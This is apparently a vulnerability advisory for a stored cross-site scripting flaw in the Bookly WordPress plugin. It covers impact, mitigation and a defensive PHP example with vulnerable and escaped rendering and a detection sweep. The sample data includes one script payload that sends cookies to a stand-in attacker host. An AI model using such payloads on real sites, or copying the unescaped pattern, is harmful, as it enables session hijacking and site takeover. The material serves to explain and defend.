CVE-2023-1172 in Bookly Plugin
Summary
by MITRE • 03/17/2023
The Bookly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the full name value in versions up to, and including, 21.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Analysis
by VulDB Data Team • 04/11/2023
The Bookly plugin for WordPress is a widely used booking system that lets site administrators manage appointments and reservations from their WordPress sites. This vulnerability affects versions up to and including 21.5, so any installation that has not updated past that release is exposed. The stored cross-site scripting flaw lies in the full name field, which the booking form uses to collect customer information. The plugin stores that value without adequate sanitization and later renders it in HTML without output escaping.
When a visitor enters a full name during the booking process, the plugin saves the raw value. Because the payload is written to the database rather than merely echoed back in a single response, the flaw is a stored (persistent) XSS: it executes in the browser of every user who later views a page where that name is rendered. For this plugin that includes the admin-side appointment and customer views, so the most likely victim is a logged-in administrator rather than another customer. A script running in that context acts with the victim's privileges, for example by issuing authenticated requests to the WordPress admin on the victim's behalf. Note that WordPress marks its authentication cookies HttpOnly, so outright cookie theft is less realistic than riding the victim's session. No authentication is required of the attacker, who only needs to submit the public booking form.
The operational impact therefore goes well beyond a single script execution. If the script runs in an administrator's browser, it can use that session to create additional administrator accounts, install plugins or edit theme files, which amounts to compromise of the whole WordPress installation; it can also rewrite content or redirect visitors to phishing sites. Because the payload is stored, it fires every time the affected record is displayed, without any further action by the attacker, and can go unnoticed for a long time while credentials are harvested through injected forms, user activity is monitored, or a backdoor is planted. Any site that exposes Bookly's booking form to guests is affected, since the injection point is that public form.
Mitigation should start with updating Bookly to version 21.6 or later, which contains the fix. After updating, review customer records created while the vulnerable version was active, since a fix that only sanitizes new input does not clean rows written earlier. As defence in depth, validate and sanitize input on the server (client-side checks are a usability aid, not a security control) and escape every user-supplied value for the context in which it is output; output escaping is the control that actually stops XSS. A web application firewall can block common probes but is routinely bypassed with encoding variants and should not be relied on as the primary fix; regular audits of other plugins and themes help catch similar flaws. The weakness is CWE-79 (Improper Neutralization of Input During Web Page Generation). The ATT&CK reference cited for this entry, T1566.001, denotes Phishing: Spearphishing Attachment, which describes delivery of malicious attachments and is not an accurate fit for stored XSS; T1059.007 (Command and Scripting Interpreter: JavaScript) describes the behaviour more closely. Either way, the flaw warrants both preventive and detective controls within WordPress environments.
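The following stand-alone PHP is an added illustration for this entry, not code from Bookly or from the entry's authors. It shows the vulnerable pattern described above (a stored name concatenated straight into HTML) beside the hardened form (escaping at output, with server-side sanitization at input), and a sweep of already-stored names for markup, which is the post-update review recommended above. The row-rendering and sanitization function names, the in-memory sample list standing in for database rows, and the detection regular expression are assumptions made for the demonstration; the WordPress functions named in comments are only called when the script runs inside WordPress.

```php
<?php
// Added illustration; not Bookly's code. Function names, the sample list and
// the regex are assumptions for the demonstration.
declare(strict_types=1);

// Constructed sample: values an unauthenticated visitor could submit in the
// booking form's full-name field. The second is a typical stored-XSS probe.
// On WordPress, document.cookie would not return the HttpOnly auth cookies,
// so a real payload would instead issue requests with the victim's session.
const SAMPLE_NAMES = [
    'Ada Lovelace',
    '<script>document.location="https://attacker.example/?c="+document.cookie</script>',
    "O'Brien & Sons <b>VIP</b>",
];

// Vulnerable pattern: the stored value is concatenated straight into HTML,
// so any markup in the name becomes part of the page.
function render_customer_row_vulnerable(string $full_name): string
{
    return '<td>' . $full_name . '</td>';
}

// Hardened pattern: escape at the point of output, for the HTML text context.
// Inside WordPress this is esc_html(); the fallback is the equivalent PHP call
// so the example runs without WordPress.
function escape_html(string $value): string
{
    if (function_exists('esc_html')) {
        return esc_html($value);
    }
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_customer_row_hardened(string $full_name): string
{
    return '<td>' . escape_html($full_name) . '</td>';
}

// Input-side defence in depth: strip tags and control characters before
// storing. Inside WordPress this is sanitize_text_field(); the fallback
// approximates it. This does not replace output escaping.
function sanitize_name(string $value): string
{
    if (function_exists('sanitize_text_field')) {
        return sanitize_text_field($value);
    }
    $value = strip_tags($value);
    $value = preg_replace('/[\x00-\x1F\x7F]/', '', $value) ?? '';
    return trim(preg_replace('/\s+/', ' ', $value) ?? '');
}

// Detective control: after updating, sweep names stored while the vulnerable
// version was live. A fix that only sanitizes new input leaves old rows as
// they were. Keys are preserved so hits can be traced back to their rows.
function find_suspicious_names(array $names): array
{
    $hits = [];
    foreach ($names as $key => $name) {
        if (preg_match('/<\s*\/?\s*[a-z!]|javascript:|\bon[a-z]+\s*=/i', $name)) {
            $hits[$key] = $name;
        }
    }
    return $hits;
}

foreach (SAMPLE_NAMES as $name) {
    echo 'vulnerable: ' . render_customer_row_vulnerable($name) . PHP_EOL;
    echo 'hardened:   ' . render_customer_row_hardened($name) . PHP_EOL;
    echo 'sanitized:  ' . sanitize_name($name) . PHP_EOL . PHP_EOL;
}

// Rows 1 and 2 of the sample are flagged; the plain name is not.
print_r(find_suspicious_names(SAMPLE_NAMES));
```

Run it with `php` on the command line: the hardened output shows the script tag rendered as literal text (`&lt;script&gt;...`) while the vulnerable output emits it verbatim, and the sweep lists the two names containing markup for manual review. The sweep is deliberately broad (a `<b>` tag in a name is flagged even though it is harmless once output is escaped); for a real database, run the same test over the exported name column and treat each hit as a record to inspect and clean, not as proof of exploitation.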